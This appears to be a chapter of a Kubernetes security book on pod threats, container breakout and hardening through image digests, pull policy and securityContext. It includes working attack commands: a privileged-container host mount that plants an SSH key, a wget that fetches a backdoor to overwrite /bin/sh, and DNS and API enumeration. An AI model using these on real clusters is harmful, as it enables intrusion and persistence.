Chapter 2. Pod-Level Resources

This chapter concerns the atomic unit of Kubernetes deployment: a pod. Pods run apps, and an app may be one or more containers working together in one or more pods.

We’ll consider what bad things can happen in and around a pod, and look at how you can mitigate the risk of getting attacked.

As with any sensible security effort, we’ll begin by defining a lightweight threat model for your system, identifying the threat actors it defends against, and highlighting the most dangerous threats. This gives you a solid basis to devise countermeasures and controls, and take defensive steps to protect your customer’s valuable data.

We’ll go deep into the security model of a pod and look at what is trusted by default, where we can tighten security with configuration, and what an attacker’s journey looks like.

Threat Model

We define a scope for each threat model. Here, you are threat modeling a pod. Let’s consider a simple group of Kubernetes threats to begin with:

Attacker on the network

Sensitive endpoints (such as the API server) can be attacked easily if public.

Compromised application leads to foothold in container

A compromised application (remote code execution, supply chain compromise) is the start of an attack.

Establish persistence

Stealing credentials or gaining persistence resilient to pod, node, and/or container restarts.

Malicious code execution

Running exploits to pivot or escalate and enumerating endpoints.

Access sensitive data

Reading Secret data from the API server, attached storage, and network-accessible datastores.

Denial of service

Rarely a good use of an attacker’s time. Denial of Wallet and cryptolocking are common variants.

Tip

The threat sources in “Prior Art” have other negative outcomes to cross-reference with this list.

Anatomy of the Attack


Captain Hashjack started their assault on your systems by enumerating BCTL’s DNS subdomains and S3 buckets. These could have offered an easy way into the organization’s systems, but there was nothing easily exploitable on this occasion.

Undeterred, they create an account on the public website and log in, using a web application scanner like zaproxy (OWASP Zed Attack Proxy) to pry into API calls and application code for unexpected responses. They’re hunting for leaked web server banner and version information (to learn which exploits might succeed) and generally injecting and fuzzing APIs to find poorly handled user input.

This is not a level of scrutiny that your poorly maintained codebase and systems are likely to withstand for long. Attackers may be searching for a needle in a haystack, but only the safest haystack has no needles at all.

Although many parts of an attack can be automated, this is an involved process. A casual attacker is more likely to scan widely for software paths that trigger published CVEs and run automated tools and scripts against large ranges of IPs (such as the ranges advertised by public cloud providers). These are noisy approaches.

Remote Code Execution

If a vulnerability in your application can be used to run untrusted (and in this case, external) code, it is called a remote code execution (RCE). An adversary can use an RCE to spawn a remote control session into the application’s environment: here it is the container handling the network request, but if the RCE manages to pass untrusted input deeper into the system, it may exploit a different process, pod, or cluster.

Your first goal of Kubernetes and pod security should be to prevent RCE, which could be as simple as a kubectl exec, or as complex as a reverse shell, such as the one demonstrated in Figure 2-2.

Figure 2-2. Reverse shell into a Kubernetes pod

Application code changes frequently and may hide undiscovered bugs, so robust application security (AppSec) practices (including IDE and CI/CD integration of tooling and dedicated security requirements as task acceptance criteria) are essential to keep an attacker from compromising the processes running in a pod.

With that, let’s move on to the network aspects.

Network Attack Surface

The greatest attack surface of a Kubernetes cluster is its network interfaces and public-facing pods. Network-facing services such as web servers are the first line of defense in keeping your clusters secure, a topic we will dive into in Chapter 5.

This is because unknown users coming in from across the network can scan network-facing applications for the exploitable signs of RCE. They can use automated network scanners to attempt to exploit known vulnerabilities and input-handling errors in network-facing code. If a process or system can be forced to run in an unexpected way, there is the possibility that it can be compromised through these untested logic paths.

To investigate how an attacker may establish a foothold in a remote system using only the humble, all-powerful Bash shell, see, for example, Chapter 16 of Cybersecurity Ops with bash by Paul Troncone and Carl Albing (O’Reilly).

To defend against this, we must scan containers for operating system and application CVEs in the hope of updating them before they are exploited.

If Captain Hashjack has an RCE into a pod, it’s a foothold to attack your system more deeply from the pod’s network position and permissions set. You should strive to limit what an attacker can do from this position, and customize your security configuration to a workload’s sensitivity. If your controls are too loose, this may be the beginning of an organization-wide breach for your employer, BCTL.

As Dread Pirate Hashjack has just discovered, we have also been running a vulnerable version of the Struts library. This offers an opportunity to start attacking the cluster from within.

As the attack begins, let’s take a look at where the pirates have landed: inside a Kubernetes pod.

Kubernetes Workloads: Apps in a Pod

Multiple cooperating containers can be logically grouped into a single pod, and every container Kubernetes runs must run inside a pod. Sometimes a pod is called a “workload,” which is one of many copies of the same execution environment. Each pod must run on a Node in your Kubernetes cluster as shown in Figure 2-3.

A pod is a single instance of your application; to scale with demand, a workload resource (such as a Deployment, DaemonSet, or StatefulSet) replicates the application across many identical pods.

Your pods may include sidecar containers supporting monitoring, network, and security, and “init” containers for pod bootstrap, enabling you to deploy different application styles. These sidecars are likely to have elevated privileges and be of interest to an adversary.

“Init” containers run in order (first to last) to set up a pod and can make security changes to its namespaces, like Istio’s init container, which configures the pod’s iptables rules (in the kernel’s netfilter) so that the runtime (non-init) containers route traffic through a sidecar container. Sidecars run alongside the primary container in the pod, and all non-init containers in a pod start at the same time.
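A minimal sketch of this layout (the pod name, images, and commands here are illustrative, not taken from any particular product): the init container runs to completion before the app container and its sidecar start together.

apiVersion: v1
kind: Pod
metadata:
  name: app-with-init-and-sidecar
spec:
  initContainers:
  - name: init-permissions        # runs first, to completion
    image: busybox:1.35
    command: ["sh", "-c", "chown -R 1000:1000 /cache"]
    volumeMounts:
    - name: cache
      mountPath: /cache
  containers:                     # all non-init containers start together
  - name: app
    image: nginx:1.21
    volumeMounts:
    - name: cache
      mountPath: /cache
  - name: log-shipper             # sidecar running alongside the app
    image: busybox:1.35
    command: ["sh", "-c", "tail -F /cache/app.log"]
    volumeMounts:
    - name: cache
      mountPath: /cache
  volumes:
  - name: cache
    emptyDir: {}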

What’s inside a pod? Cloud native applications are often microservices, web servers, workers, and batch processes. Some pods run one-shot tasks (wrapped in a Job, or perhaps a single nonrestarting container), sometimes spawning other pods to assist. All these pods present an opportunity to an attacker. Pods get hacked. Or, more often, a network-facing container process gets hacked.

A pod is a trust boundary encompassing all the containers inside, including their identity and access. There is still separation between pods that you can enhance with policy configuration, but you should consider the entire contents of a pod when threat modeling it.

What’s a Pod?

A pod as depicted in Figure 2-4 is a Kubernetes invention. It’s an environment for multiple containers to run inside. The pod is the smallest deployable unit you can ask Kubernetes to run and all containers in it will be launched on the same node. A pod has its own IP address, can mount in storage, and its namespaces surround the containers created by the container runtime such as containerd or CRI-O.

Figure 2-4. Example pods (source: Kubernetes documentation)

A container is a mini-Linux, and its processes are containerized with control groups (cgroups) to limit resource usage and namespaces to limit access. A variety of other controls can be applied to restrict a containerized process’s behavior, as we’ll see in this chapter.

The lifecycle of a pod is controlled by the kubelet, the Kubernetes API server’s deputy, deployed on each node in the cluster to manage and run containers. If the kubelet loses contact with the API server, it continues to manage its workloads, restarting them if necessary. If the kubelet itself crashes, the container manager keeps the existing containers running. Together, the kubelet and container manager oversee your workloads.

The kubelet runs pods on worker nodes, instructing the container runtime and configuring networking and storage. Each container in a pod is a collection of Linux namespaces, cgroups, capabilities, and Linux Security Modules (LSMs). As the container runtime builds a container, each namespace is created and configured individually before being combined into a container.

Tip

Capabilities are individual switches for “special” root user operations such as changing any file’s permissions, loading modules into the kernel, accessing devices in raw mode (e.g., networks and I/O), and using BPF and performance monitoring, among other privileged operations.

The root user has all capabilities, and capabilities can be granted to any process or user (“ambient capabilities”). Excess capability grants may lead to container breakout, as we see later in this chapter.

In Kubernetes, a newly created container is added to the pod by the container runtime and shares the network and interprocess communication (IPC) namespaces with the pod’s other containers.

Figure 2-5 shows a kubelet running four individual pods on a single node.

The container is the first line of defense against an adversary, and container images should be scanned for CVEs before being run. This simple step reduces the risk of running an outdated or malicious container and informs your risk-based deployment decisions: do you ship to production, or is there an exploitable CVE that needs patching first?
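For example, an open source scanner such as Trivy (one option among several) can gate a CI pipeline on scan results. A sketch, using the frontend image we deploy later in this chapter:

$ trivy image gcr.io/google-samples/microservices-demo/frontend:v0.2.3

# fail the pipeline if HIGH or CRITICAL vulnerabilities are found
$ trivy image --exit-code 1 --severity HIGH,CRITICAL \
    gcr.io/google-samples/microservices-demo/frontend:v0.2.3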

Tip

“Official” container images in public registries have a greater likelihood of being up to date and well-patched, and Docker Hub signs all official images with Notary, as we’ll see in Chapter 4.

Public container registries often host malicious images, so detecting them before production is essential. Figure 2-6 shows how this might happen.

The kubelet attaches pods to a Container Network Interface (CNI). CNI network traffic is treated as layer 4 TCP/IP (although the underlying network technology used by the CNI plug-in may differ), and encryption is the job of the CNI plug-in, the application, a service mesh, or at a minimum, the underlay networking between the nodes. If traffic is unencrypted, it may be sniffed by a compromised pod or node.

Figure 2-6. Poisoning a public container registry
Warning

Although starting a malicious container under a correctly configured container runtime is usually safe, there have been attacks against the container bootstrap phase. We examine the /proc/self/exe breakout CVE-2019-5736 later in this chapter.

Pods can also have storage attached by Kubernetes, using the Container Storage Interface (CSI), which includes the PersistentVolumeClaim and StorageClass shown in Figure 2-7. In Chapter 6 we will get deeper into the storage aspects.

In Figure 2-7 you can see a view of the control plane and the API server’s central role in the cluster. The API server is responsible for interacting with the cluster datastore (etcd), hosting the cluster’s extensible API surface, and managing the kubelets. If the API server or etcd instance is compromised, the attacker has complete control of the cluster: these are the most sensitive parts of the system.

For performance in larger clusters, the control plane should run on separate infrastructure from etcd, which requires high disk and network I/O to support reasonable response times for its distributed consensus algorithm, Raft.

As the API server is the etcd cluster’s only client, compromise of either effectively roots the cluster: because scheduling is asynchronous, malicious, unscheduled pods injected directly into etcd will subsequently be scheduled to a kubelet.

As with all fast-moving software, there have been vulnerabilities in most parts of the Kubernetes stack. The only sustainable way to run modern software is a healthy continuous integration infrastructure capable of promptly patching and redeploying vulnerable clusters when a vulnerability is announced.

Understanding Containers

Okay, so we have a high-level view of a cluster. But at a low level, what is a “container”? It is a microcosm of Linux that gives a process the illusion of a dedicated kernel, network, and userspace. Software trickery fools the process inside your container into believing it is the only process running on the host machine. This is useful for isolation and migration of your existing workloads into Kubernetes.

Note

As Christian Brauner and Stéphane Graber like to say “(Linux) containers are a userspace fiction,” a collection of configurations that present an illusion of isolation to a process inside. Containers emerged from the primordial kernel soup, a child of evolution rather than intelligent design that has been morphed, refined, and coerced into shape so that we now have something usable.

Containers don’t exist as a single API, library, or kernel feature. They are merely the resultant bundling and isolation that’s left over once the kernel has started a collection of namespaces, configured some cgroups and capabilities, added Linux Security Modules like AppArmor and SELinux, and started our precious little process inside.

A container is a process in a special environment with some combination of namespaces either enabled or shared with the host (or other containers). The process comes from a container image, a TAR file containing the container’s root filesystem, its application(s), and any dependencies. When the image is unpacked into a directory on the host and a special filesystem “pivot root” is created, a “container” is constructed around it, and its ENTRYPOINT is run from the filesystem within the container. This is roughly how a container starts, and each container in a pod must go through this process.
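You can approximate these steps by hand with standard Linux tooling. A rough sketch (ignoring cgroups, capabilities, and LSMs, and using chroot where a real runtime would use pivot_root):

# unpack an image's root filesystem into a directory
$ mkdir rootfs
$ docker export $(docker create busybox) | tar -xf - -C rootfs

# create new namespaces and run a shell inside the unpacked
# filesystem: a very crude "container"
$ sudo unshare --mount --uts --ipc --net --pid --fork \
    chroot rootfs /bin/sh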

Container security has two parts: the contents of the container image, and its runtime configuration and security context. An abstract risk rating of a container can be derived from the number of security primitives it enables and uses safely, avoiding host namespaces, limiting resource use with cgroups, dropping unneeded capabilities, tightening security module configuration for the process’s usage pattern, and minimizing process and filesystem ownership and contents. Kubesec.io rates a pod configuration’s security on how well it enables these features at runtime.
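A sketch of running kubesec against a manifest (assuming the kubesec binary is installed locally):

$ kubesec scan pod.yaml
# returns a JSON report with a numeric "score" plus "critical" and
# "advise" findings about the securityContext and related settings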

When the kernel detects that a network namespace is empty, it destroys the namespace, removing any IPs allocated to network adapters in it. If a pod’s only container held the network namespace, a crashed and restarted container would get a fresh network namespace and therefore a new IP. This rapid churn of IPs would create unnecessary noise for your operators and security monitoring, so Kubernetes uses the so-called pause container (see also “Intra-Pod Networking”) to hold the pod’s shared network namespace open while a tenant container crash-loops. From inside a worker node, the companion pause container in each pod looks as follows:

andy@k8s-node-x:~ [0]$ docker ps --format '{{.Image}} {{.Names}}' |
  grep "sublimino-"
busybox k8s_alpine_sublimino-frontend-5cc74f44b8-4z86v_default-0
k8s.gcr.io/pause:3.3 k8s_POD_sublimino-frontend-5cc74f44b8-4z86v-1
...
busybox k8s_alpine_sublimino-microservice-755d97b46b-xqrw9_default_0
k8s.gcr.io/pause:3.3 k8s_POD_sublimino-microservice-755d97b46b-xqrw9_default_1
...
busybox k8s_alpine_sublimino-frontend-5cc74f44b8-hnxz5_default_0
k8s.gcr.io/pause:3.3 k8s_POD_sublimino-frontend-5cc74f44b8-hnxz5_default_1

This pause container is invisible via the Kubernetes API, but visible to the container runtime on the worker node.

Sharing Network and Storage

A group of containers in a pod share a network namespace, so all your containers’ ports are available on the same network adapter to every container in the pod. This gives an attacker in one container of the pod a chance to attack private sockets available on any network interface, including the loopback adapter 127.0.0.1.
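For example, assuming a hypothetical pod named web with an nginx container listening on port 80 and a second container called debug, an attacker with a shell in the debug container can reach the web server’s socket over the shared loopback adapter:

# pod and container names are hypothetical; assumes the debug
# container ships a wget binary (e.g., busybox)
$ kubectl exec -it web -c debug -- wget -qO- http://127.0.0.1:80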

Each container runs in a root filesystem from its container image that is not shared between containers. Volumes must be mounted into each container in the pod configuration, but a pod’s volumes may be available to all containers if configured that way, as you saw in Figure 2-4.

Figure 2-8 shows some of the paths inside a container workload that an attacker may be interested in (note the user and time namespaces are not currently in use).

Figure 2-8. Namespaces wrapping the containers in a pod (inspired by Ian Lewis)

The special virtual filesystems listed here are all possible paths of breakout if misconfigured and accessible inside the container: /dev may give access to the host’s devices, /proc can leak process information, or /sys supports functionality like launching new containers.

What’s the Worst That Could Happen?

A CISO is responsible for the organization’s security. Your role as a CISO means you should consider worst-case scenarios, to ensure that you have appropriate defenses and mitigations in place. Attack trees help to model these negative outcomes, and one of the data sources you can use is the threat matrix as shown in Figure 2-9.

Figure 2-9. Microsoft Kubernetes threat matrix; source: “Secure Containerized Environments with Updated Threat Matrix for Kubernetes”

But there are some threats missing, and the community has added some (thanks to Alcide, and Brad Geesaman and Ian Coldwater again), as shown in Table 2-1.

Table 2-1. Our enhanced Microsoft Kubernetes threat matrix
Initial access (popping a shell pt 1 - prep) Execution (popping a shell pt 2 - exec) Persistence (keeping the shell) Privilege escalation (container breakout) Defense evasion (assuming no IDS) Credential access (juicy creds) Discovery (enumerate possible pivots) Lateral movement (pivot) Command & control (C2 methods) Impact (dangers)

Using cloud credentials: service account keys, impersonation

Exec into container (bypass admission control policy)

Backdoor container (add a reverse shell to local or container registry image)

Privileged container (legitimate escalation to host)

Clear container logs (covering tracks after host breakout)

List K8s Secrets

List K8s API server (nmap, curl)

Access cloud resources (workload identity and cloud integrations)

Dynamic resolution (DNS tunneling)

Data destruction (datastores, files, NAS, ransomware…)

Compromised images in registry (supply chain unpatched or malicious)

BASH/CMD inside container (implant or trojan, RCE/reverse shell, malware, C2, DNS tunneling)

Writable host path mount (host mount breakout)

Cluster admin role binding (untested RBAC)

Delete K8s events (covering tracks after host breakout)

Mount service principal (Azure specific)

Access kubelet API

Container service account (API server)

App protocols (L7 protocols, TLS, …)

Resource hijacking (cryptojacking, malware C2/distribution, open relays, botnet membership)

Application vulnerability (supply chain unpatched or malicious)

Start new container (with malicious payload: persistence, enumeration, observation, escalation)

K8s CronJob (reverse shell on a timer)

Access cloud resources (metadata attack via workload identity)

Connect from proxy server (to cover source IP, external to cluster)

Applications credentials in config files (key material)

Access K8s dashboard (UI requires service account credentials)

Cluster internal networking (attack neighboring pods or systems)

Botnet (k3d, or traditional)

Application DoS

kubeconfig file (exfiltrated, or uploaded to the wrong place)

Application exploit (RCE)

Static pods (reverse shell, shadow API server to read audit-log-only headers)

Pod hostPath mount (logs to container breakout)

Pod/container name similarity (visual evasion, CronJob attack)

Access container service account (RBAC lateral jumps)

Network mapping (nmap, curl)

Access container service account (RBAC lateral jumps)

Node scheduling DoS

Compromise user endpoint (2FA and federating auth mitigate)

SSH server inside container (bad practice)

Injected sidecar containers (malicious mutating webhook)

Node to cluster escalation (stolen credentials, node label rebinding attack)

Dynamic resolution (DNS) (DNS tunneling/exfiltration)

Compromise admission controllers

Instance metadata API (workload identity)

Host writable volume mounts

Service discovery DoS

K8s API server vulnerability (needs CVE and unpatched API server)

Container lifecycle hooks (postStart and preStop events in pod YAML)

Rewrite container lifecycle hooks (postStart and preStop events in pod YAML)

Control plane to cloud escalation (keys in Secrets, cloud or control plane credentials)

Shadow admission control or API server

Compromise K8s Operator (sensitive RBAC)

Access K8s dashboard

PII or IP exfiltration (cluster or cloud datastores, local accounts)

Compromised host (credentials leak/stuffing, unpatched services, supply chain compromise)

Rewrite liveness probes (exec into and reverse shell in container)

Compromise admission controller (reconfigure and bypass to allow blocked image with flag)

Access host filesystem (host mounts)

Access tiller endpoint (Helm v3 negates this)

Container pull rate limit DoS (container registry)

Compromised etcd (missing auth)

Shadow admission control or API server (privileged RBAC, reverse shell)

Compromise K8s Operator (compromise flux and read any Secrets)

Access K8s Operator

SOC/SIEM DoS (event/audit/log rate limit)

K3d botnet (secondary cluster running on compromised nodes)

Container breakout (kernel or runtime vulnerability e.g., DirtyCOW, `/proc/self/exe`, eBPF verifier bugs, Netfilter)

We’ll explore these threats in detail as we progress through the book. But the first threat, and the greatest risk to the isolation model of our systems, is an attacker breaking out of the container itself.

Container Breakout

A cluster admin’s worst fear is a container breakout; that is, a user or process inside a container that can run code outside of the container’s execution environment.

Note

Strictly speaking, a container breakout should exploit the kernel, attacking the code a container is supposed to be constrained by. In the authors’ opinion, any avoidance of isolation mechanisms breaks the contract the container’s maintainer or operator thought they had with the process(es) inside. This means it should be considered equally threatening to the security of the host system and its data, so we define container breakout to include any evasion of isolation.

Container breakouts may occur in various ways:

If the running process is owned by an unprivileged user (that is, one with no root capabilities), many breakouts are not possible. In that case the process or user must gain capabilities with a local privilege escalation inside the container before attempting to break out.

Once this is achieved, a breakout may start with a hostile root-owned process running in a poorly configured container. Access to the root user’s capabilities within a container is the precursor to most escapes: without root (and sometimes CAP_SYS_ADMIN), many breakouts are nullified.

In a container breakout scenario, if the user is root inside the container or has mount capabilities (granted by CAP_SYS_ADMIN, which root holds unless it is dropped), they can interact with virtual and physical disks mounted into the container. If the container is privileged (which among other things disables masking of kernel paths in /dev), it can see and mount the host filesystem:

# inside a privileged container
root@hack:~ [0]$ ls -lasp /dev/
root@hack:~ [0]$ mount /dev/xvda1 /mnt/

# write into host filesystem's /root/.ssh/ folder
root@hack:~ [0]$ cat MY_PUB_KEY >> /mnt/root/.ssh/authorized_keys

We look at nsenter privileged container breakouts, which escape more elegantly by entering the host’s namespaces, in Chapter 6.

While this attack is easily prevented by avoiding the root user and privileged mode, and enforcing that with admission control, it’s an indication of just how slim the container security boundary can be when misconfigured.

Warning

An attacker controlling a containerized process may have control of the networking, some or all of the storage, and potentially other containers in the pod. Containers generally assume other containers in the pod are friendly as they share resources, and we can consider the pod as a trust boundary for the processes inside. Init containers are an exception: they complete and shut down before the main containers in the pod start, and as they operate in isolation may have more security sensitivity.

The container and pod isolation model relies on the Linux kernel and container runtime, both of which are generally robust when not misconfigured. Container breakout occurs more often through insecure configuration than kernel exploit, although zero-day kernel vulnerabilities are inevitably devastating to Linux systems without correctly configured LSMs (such as SELinux and AppArmor).

Note

In “Architecting Containerized Apps for Resilience” we explore how the Linux DirtyCOW vulnerability could be used to break out of insecurely configured containers.

Container escape is rarely plain sailing, and fresh vulnerabilities are often patched shortly after disclosure. Only occasionally does a kernel vulnerability result in an exploitable container breakout, and hardening individually containerized processes with LSMs lets defenders tightly constrain high-risk network-facing processes. An escape may entail one or more of:

  • Finding a zero-day in the runtime or kernel

  • Exploiting excess privilege and escaping using legitimate commands

  • Evading misconfigured kernel security mechanisms

  • Introspection of other processes or filesystems for alternate escape routes

  • Sniffing network traffic for credentials

  • Attacking the underlying orchestrator or cloud environment

Finding new kernel attacks is hard. Misconfigured security settings, exploiting published CVEs, and social engineering attacks are easier. But it’s important to understand the range of potential threats in order to decide your own risk tolerance.

We’ll go through a step-by-step security feature exploration to see a range of ways in which your systems may be attacked in Appendix A.

For more information on how the Kubernetes project manages CVEs, see Anne Bertucio and CJ Cullen’s blog post, “Exploring Container Security: Vulnerability Management in Open-Source Kubernetes”.

Pod Configuration and Threats

We’ve spoken generally about various parts of a pod, so let’s finish off by going into depth on a pod spec to call out any gotchas or potential footguns.

For the purpose of this example, we are using a frontend pod from the GoogleCloudPlatform/microservices-demo application, and it was deployed with the following command:

kubectl create -f \
"https://raw.githubusercontent.com/GoogleCloudPlatform/\
microservices-demo/master/release/kubernetes-manifests.yaml"

We have updated and added some extra configuration where relevant for demonstration purposes and will progress through these in the following sections.

Pod Header

The pod header is the standard header of all Kubernetes resources we know and love, declaring the kind of entity this YAML defines and its API version:

apiVersion: v1
kind: Pod

Metadata and annotations may contain sensitive information like IP addresses or security hints (in this case, for Istio), although this is only useful if the attacker has read-only access:

metadata:
  annotations:
    seccomp.security.alpha.kubernetes.io/pod: runtime/default
    cni.projectcalico.org/podIP: 192.168.155.130/32
    cni.projectcalico.org/podIPs: 192.168.155.130/32
    sidecar.istio.io/rewriteAppHTTPProbers: "true"

It also historically holds the seccomp, AppArmor, and SELinux policies:

metadata:
  annotations:
    container.apparmor.security.beta.kubernetes.io/hello: "localhost/\
      k8s-apparmor-example-deny-write"

We look at how to use these annotations in “Runtime Policies”.

Let’s move on to a part of the pod spec that contains some important hints for an attacker: the container image.

Container Images

The container image’s filesystem is of paramount importance, as it may hold vulnerabilities that assist in privilege escalation. If you’re not patching regularly, Captain Hashjack might get the same image from a public registry to scan it for vulnerabilities they may be able to exploit. Knowing what binaries and files are available also enables attack planning “offline,” so adversaries can be more stealthy and targeted when attacking the live system.

Here we see an image referenced by tag, which means we can’t tell what the actual SHA256 hash digest of the container image is. The tag could have been updated in the registry since this deployment, as the image is not referenced by digest:

  image: gcr.io/google-samples/microservices-demo/frontend:v0.2.3

Instead of using image tags, we can use the SHA256 image digests to pull the image by its content address:

  image: gcr.io/google-samples/microservices-demo/frontend@sha256:ca5d97b6cec...

Images should always be referenced by SHA256 digest or a signed tag; otherwise, it’s impossible to know what’s running, as the tag may have been updated in the registry since the container started. You can validate what’s being run by inspecting the running container for its image’s SHA256.
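For example, the pod’s status records the image reference the kubelet actually resolved and ran (the pod name here is illustrative, and the exact output prefix depends on your container runtime):

$ kubectl get pod frontend-5cc74f44b8-4z86v \
    -o jsonpath='{.status.containerStatuses[*].imageID}'
# prints the image reference pinned by digest, e.g.
# .../frontend@sha256:ca5d97b6cec...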

It’s possible to specify both a tag and an SHA256 digest in a Kubernetes image: key, in which case the tag is ignored and the image is retrieved by digest. This leads to potentially confusing image definitions such as the following, which includes both a tag and a SHA256 and is retrieved as the image matching the digest rather than the tag:

controlplane/bizcard:latest\ 1
@sha256:649f3a84b95ee84c86d70d50f42c6d43ce98099c927f49542c1eb85093953875 2
1

Image name, plus the ignored “latest” tag

2

Image SHA256, which overrides the “latest” tag defined in the previous line


If an attacker can influence the local kubelet image cache, they can add malicious code to an image and relabel it on the worker node (note: to run this again, don’t forget to remove the cidfile):

$ docker run -it --cidfile=cidfile --entrypoint /bin/busybox \
  gcr.io/google-samples/microservices-demo/frontend:v0.2.3 \
  wget https://securi.fyi/b4shd00r -O /bin/sh 1

$ docker commit $(<cidfile) \
  gcr.io/google-samples/microservices-demo/frontend:v0.2.3 2
1

Download a malicious backdoor and overwrite the container’s default shell (/bin/sh) with it.

2

Commit the changed container using the same image name and tag.

While the compromise of a local registry cache may lead to this attack, container cache access probably comes by rooting the node, and so this may be the least of your worries.

This attack on a local image cache can be mitigated with an image pull policy of Always, which will ensure the local tag matches what’s defined in the registry it’s pulled from. This is important and you should always be mindful of this setting:

  imagePullPolicy: Always

Typos in container image names, or registry names, will deploy unexpected code if an adversary has “typosquatted” the image with a malicious container.

This can be difficult to detect when only a single character changes (for example, controlplan/hack instead of controlplane/hack). Tools like Notary protect against this by checking for valid signatures from trusted parties. If a TLS-intercepting middlebox rewrites an image tag in transit, a spoofed image may be deployed.

Again, TUF and Notary’s out-of-band signing mitigates this, as do other container signing approaches like cosign, discussed in Chapter 4.
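As a sketch of what verification looks like with cosign (assuming the image was signed with a key pair created by cosign generate-key-pair; this image is used only as an illustration):

# verification succeeds only if a matching signature exists in the registry
$ cosign verify --key cosign.pub \
    gcr.io/google-samples/microservices-demo/frontend:v0.2.3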

DNS

By default, Kubernetes DNS servers provide records for all services across the cluster, which undermines namespace segregation unless DNS is deployed individually per namespace or domain.

The default Kubernetes CoreDNS installation leaks information about its services, offering an attacker a view of all possible network endpoints (see Figure 2-10). Of course, they may not all be reachable if a network policy is in place, as we will see in “Traffic Flow Control”.

DNS enumeration can be performed against a default, unrestricted CoreDNS installation. To retrieve all services in the cluster (output edited to fit):

root@hack-3-fc58fe02:/ [0]# dig +noall +answer \
  srv any.any.svc.cluster.local |
  sort --human-numeric-sort --key 7

any.any.svc.cluster.local. 30 IN SRV 0 6 53 kube-dns.kube-system.svc.cluster...
any.any.svc.cluster.local. 30 IN SRV 0 6 80 frontend-external.default.svc.clu...
any.any.svc.cluster.local. 30 IN SRV 0 6 80 frontend.default.svc.cluster.local.
...
Figure 2-10. The wisdom of Rory McCune on the difficulties of hard multitenancy

To list all service endpoints and names, do the following (output edited to fit):

root@hack-3-fc58fe02:/ [0]# dig +noall +answer \
  srv any.any.any.svc.cluster.local |
  sort --human-numeric-sort --key 7

any.any.any.svc.cluster.local. 30 IN SRV 0 3 53 192-168-155-129.kube-dns.kube...
any.any.any.svc.cluster.local. 30 IN SRV 0 3 53 192-168-156-130.kube-dns.kube...
any.any.any.svc.cluster.local. 30 IN SRV 0 3 3550 192-168-156-133.productcata...
...

To return an IPv4 address based on the query:

root@hack-3-fc58fe02:/ [0]# dig +noall +answer 1-3-3-7.default.pod.cluster.local

1-3-3-7.default.pod.cluster.local. 23 IN A      1.3.3.7

The Kubernetes API server service IP information is mounted into the pod’s environment by default:

root@test-pd:~ [0]# env | grep KUBE
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT_443_TCP=tcp://10.7.240.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.7.240.1
KUBERNETES_SERVICE_HOST=10.7.240.1
KUBERNETES_PORT=tcp://10.7.240.1:443
KUBERNETES_PORT_443_TCP_PORT=443

root@test-pd:~ [0]# curl -k \
  https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}/version

{
  "major": "1",
  "minor": "19+",
  "gitVersion": "v1.19.9-gke.1900",
  "gitCommit": "008fd38bf3dc201bebdd4fe26edf9bf87478309a",
# ...

The response matches the API server’s /version endpoint.

Tip

You can detect Kubernetes API servers with this nmap script and the following function:

nmap-kube-apiserver() {
    local REGEX="major.*gitVersion.*buildDate"
    local ARGS="${@:-$(kubectl config view --minify |
        awk '/server:/{print $2}' |
        sed -E -e 's,^https?://,,' -e 's,:, -p ,g')}"

    nmap \
        --open \
        --script=http-get \
        --script-args "\
            http-get.path=/version, \
            http-get.match="${REGEX}", \
            http-get.showResponse, \
            http-get.forceTls \
        " \
        ${ARGS}
}

Next up is an important runtime policy piece: the securityContext, initially introduced by Red Hat.

Pod securityContext

This pod is running with an empty securityContext, which means that without admission controllers mutating the configuration at deployment time, the container can run a root-owned process and has all capabilities available to it:

  securityContext: {}

Exploiting the capability landscape involves an understanding of the kernel’s flags, and Stefano Lanaro’s guide provides a comprehensive overview.

Different capabilities may have particular impact on a system, and CAP_SYS_ADMIN and CAP_BPF are particularly enticing to an attacker. Notable capabilities you should be cautious about granting include:

CAP_DAC_OVERRIDE, CAP_CHOWN, CAP_DAC_READ_SEARCH, CAP_FOWNER, CAP_SETFCAP

Bypass filesystem permissions

CAP_SETUID, CAP_SETGID

Become the root user

CAP_NET_RAW

Read network traffic

CAP_SYS_ADMIN

Filesystem mount permission

CAP_SYS_PTRACE

All-powerful debugging of other processes

CAP_SYS_MODULE

Load kernel modules to bypass controls

CAP_PERFMON, CAP_BPF

Access deep-hooking BPF systems

These are the precursors for many container breakouts. As Brad Geesaman points out in Figure 2-11, processes want to be free! And an adversary will take advantage of anything within the pod they can use to escape.

Figure 2-11. Brad Geesaman’s evocative container freedom cry

Many container breakouts require root and/or CAP_SYS_ADMIN, CAP_NET_RAW, CAP_BPF, or CAP_SYS_MODULE to function.

Even when no breakout is possible, root capabilities are still required for a number of other attacks, such as CVE-2020-10749, a Kubernetes CNI plug-in person-in-the-middle (PitM) attack via IPv6 rogue router advertisements.

Tip

The excellent “A Compendium of Container Escapes” goes into more detail on some of these attacks.

We enumerate the options available in a securityContext for a pod to defend itself from hostile containers in “Runtime Policies”.

Pod Service Accounts

Service account tokens are JSON Web Tokens (JWTs) used by a pod for authentication and authorization to the API server. The default service account shouldn’t be given any permissions, and by default it comes with no authorization.

A pod’s serviceAccount configuration defines its access privileges to the API server; see “Service accounts” for the details. The service account token is mounted into all pod replicas, which share the single “workload identity”:

  serviceAccount: default
  serviceAccountName: default

Using a dedicated service account per workload segregates duty and reduces the blast radius if a pod is compromised: limiting an attacker post-intrusion is a primary goal of policy controls.
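A sketch of a dedicated, least-privilege service account, with token automounting disabled for a workload that never needs to call the API server (the names here are illustrative):

apiVersion: v1
kind: ServiceAccount
metadata:
  name: frontend-sa
automountServiceAccountToken: false
---
apiVersion: v1
kind: Pod
metadata:
  name: frontend
spec:
  serviceAccountName: frontend-sa
  automountServiceAccountToken: false   # no token mounted into the pod
  containers:
  - name: frontend
    image: gcr.io/google-samples/microservices-demo/frontend:v0.2.3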

Using the securityContext Correctly

A pod is more likely to be compromised if a securityContext is not configured, or is too permissive. The securityContext is your most effective tool to prevent container breakout.

Once an attacker gains an RCE into a running pod, the securityContext is the first line of defensive configuration you have available. It exposes kernel switches that can be set individually, and additional Linux Security Modules can be configured with fine-grained policies that prevent hostile applications from taking advantage of your systems.

